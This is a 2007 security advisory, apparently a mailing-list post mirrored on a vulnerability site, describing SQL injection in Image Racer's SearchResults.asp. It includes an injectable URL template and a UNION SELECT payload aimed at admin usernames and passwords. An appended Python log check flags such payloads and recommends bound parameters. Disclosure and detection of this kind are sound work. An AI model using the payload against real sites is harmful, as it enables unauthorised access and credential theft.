Information Security


Additional information

  Daily summary of bugs in Web applications (PHP, ASP, JSP, CGI, Perl)

  Minb Is Not A Blog default password directory

  Webspell 4.x Local File Inclusion

  PHMe CMS 0.0.2 local File Include Vulnerabilitiy

  SEC Consult SA-20070722-0 :: Remote command execution in Joomla! CMS

From:Advisory_(at)_Aria-Security.net <Advisory_(at)_Aria-Security.net>
Date:July 23, 2007
Subject:[Aria-Security] Image Racer SearchResults.asp SQL INJECTION vuln.

__________________

Aria-Security Team
__________________

Image Racer SearchResults.asp SQL Injection
Vendor: http://www.junctionquest.com/Software.asp

Example:
http://www.TARGET.com/SearchResults.asp?SearchWord=[SQL COMMAND]&WordSearchCrit=Yes&image.x=0&image.y=0

Example :
-1 'union select username,password from admin where [FIND IT YOUR SELF]=1

------------------------------------------------
Credits: Aria-Security Team
http://aria-security.net/
Personal Blog: http://outlaw.aria-security.info
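
A log check for the parameter named in this advisory, added here as an example and not part of the original post: it flags requests to SearchResults.asp whose decoded SearchWord value contains a single quote or a UNION ... SELECT sequence. The request targets are constructed samples, and the function and rule names are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed request targets in the shape of the URL shown in the advisory.
SAMPLE_REQUESTS = [
    "/SearchResults.asp?SearchWord=sunset&WordSearchCrit=Yes&image.x=0&image.y=0",
    "/SearchResults.asp?SearchWord=-1+%27union+select+c1%2Cc2+from+t1&WordSearchCrit=Yes",
    "/SearchResults.asp?SearchWord=O%27Brien&WordSearchCrit=Yes",
    "/Default.asp?SearchWord=%27union+select",  # other page: out of scope here
]

# UNION followed later by SELECT, any case, with whitespace or comments between.
UNION_SELECT = re.compile(r"\bunion\b.*?\bselect\b", re.I | re.S)


def inspect(target):
    """Return the sorted rule names (hypothetical labels) that fire for one target."""
    parts = urlsplit(target)
    # IIS paths and ASP parameter names are case-insensitive, so compare lowercased.
    if not parts.path.lower().endswith("/searchresults.asp"):
        return []
    hits = set()
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() != "searchword":
            continue
        if "'" in value:          # breaks out of a quoted SQL string literal
            hits.add("quote")     # low confidence alone: names like O'Brien match
        if UNION_SELECT.search(value):
            hits.add("union_select")
    return sorted(hits)


def scan(targets):
    """Map each flagged target to the rules it triggered."""
    return {t: h for t in targets if (h := inspect(t))}


if __name__ == "__main__":
    for target, rules in scan(SAMPLE_REQUESTS).items():
        print(",".join(rules), target)
```

A lone "quote" hit is worth reviewing rather than blocking; the durable fix is on the server side, with SearchWord passed to the database as a bound parameter instead of being concatenated into the query.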

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod